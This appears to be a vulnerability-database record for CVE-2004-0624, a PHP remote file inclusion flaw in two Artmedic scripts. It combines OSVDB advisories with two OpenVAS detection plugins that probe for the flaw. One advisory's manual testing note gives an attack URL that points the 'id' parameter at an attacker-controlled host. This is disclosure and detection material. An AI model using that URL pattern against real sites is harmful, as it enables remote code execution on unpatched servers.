ID CVE-2004-0624 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:30:00
Description
PHP remote file inclusion vulnerability in index.php for Artmedic links 5.0 (artmedic_links5) allows remote attackers to execute arbitrary PHP code by modifying the id parameter to reference a URL on a remote web server that contains the code.
{"osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "cvelist": ["CVE-2004-0624"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:11954](https://secuniaresearch.flexerasoftware.com/advisories/11954/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0412.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0384.html\n[CVE-2004-0624](https://vulners.com/cve/CVE-2004-0624)\n", "modified": "2004-06-28T07:47:45", "published": "2004-06-28T07:47:45", "href": "https://vulners.com/osvdb/OSVDB:7271", "id": "OSVDB:7271", "title": "artmedic links index.php Arbitrary File Retrieval", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0624"], "edition": 1, "description": "## Vulnerability Description\nartmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victims system, resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nartmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victims system, resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/artmedic-kleinanzeigen-path/index.php?id=http://[attacker]\n## References:\nVendor URL: http://www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php\nSecurity Tracker: 1010740\n[Secunia Advisory ID:12099](https://secuniaresearch.flexerasoftware.com/advisories/12099/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0229.html\nKeyword: Remote File Inclusion\nISS X-Force ID: 16518\nISS X-Force ID: 16741\n[CVE-2004-0624](https://vulners.com/cve/CVE-2004-0624)\n", "modified": "2004-07-18T03:08:28", "published": "2004-07-18T03:08:28", "href": "https://vulners.com/osvdb/OSVDB:8116", "id": "OSVDB:8116", "type": "osvdb", "title": "artmedic kleinanzeigen Arbitrary Code Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T16:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0624"], "description": "Artmedic Kleinanzeigen, an email verifying PHP script,\n has been found to contain an external file inclusion vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231013654", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231013654", "type": "openvas", "title": "Artmedic Kleinanzeigen File Inclusion Vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Artmedic Kleinanzeigen File Inclusion Vulnerability\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# From: Francisco Alisson <dominusvis@click21.com.br>\n# Subject: Artmedic kleinanzeigen include vulnerability\n# Date: 19.7.2004 05:25\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.13654\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-0624\");\n script_bugtraq_id(10746);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Artmedic Kleinanzeigen File Inclusion Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"The file inclusion vulnerability allows a remote attacker to include\n external PHP files as if they were the server's own, this causing the product to execute arbitrary code\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"Artmedic Kleinanzeigen, an email verifying PHP script,\n has been found to contain an external file inclusion vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) )\n exit( 0 );\n\nforeach dir( make_list_unique( \"/kleinanzeigen\", \"/php/kleinanzeigen\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" )\n dir = \"\";\n\n foreach file( make_list( \"/index.php\", \"/index.php3\", \"/index.php4\" ) ) {\n\n buf = http_get_cache( item:dir + file, port:port );\n if( ! buf || buf !~ \"^HTTP/1\\.[01] 200\" || buf !~ \"(Freewarescript by artmedic webdesign|Kleinanzeigen von artmedic webdesign|<title>Kleinanzeigen</title>)\" )\n continue;\n\n url = string( dir, file, \"?id=http://xx./\" );\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n if( ! buf )\n continue;\n\n if( 'ReadFile(\"http://xx.\")' >< buf ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:40:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0624", "CVE-2006-4905"], "description": "Artmedic Links a links generating PHP script,\n has been found to contain an external file inclusion vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231012289", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012289", "type": "openvas", "title": "artmedic_links5 File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# artmedic_links5 File Inclusion Vulnerability\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# From: Adam n30n Simuntis <n30n@satfilm.net.pl>\n# Subject: artmedic_links5 PHP Script (include path) vuln\n# Date: 25.6.2004 19:51\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12289\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_cve_id(\"CVE-2006-4905\", \"CVE-2004-0624\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"artmedic_links5 File Inclusion Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"The file inclusion vulnerability allows a remote attacker to include\n external PHP files as if they were the server's own, this causing the product to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"Artmedic Links a links generating PHP script,\n has been found to contain an external file inclusion vulnerability.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = dir + \"/artmedic_links5/index.php?id=index.php\";\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n\n if( buf =~ \"^HTTP/1\\.[01] 200\" && 'require(\"linksscript/include.php\");' >< buf ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
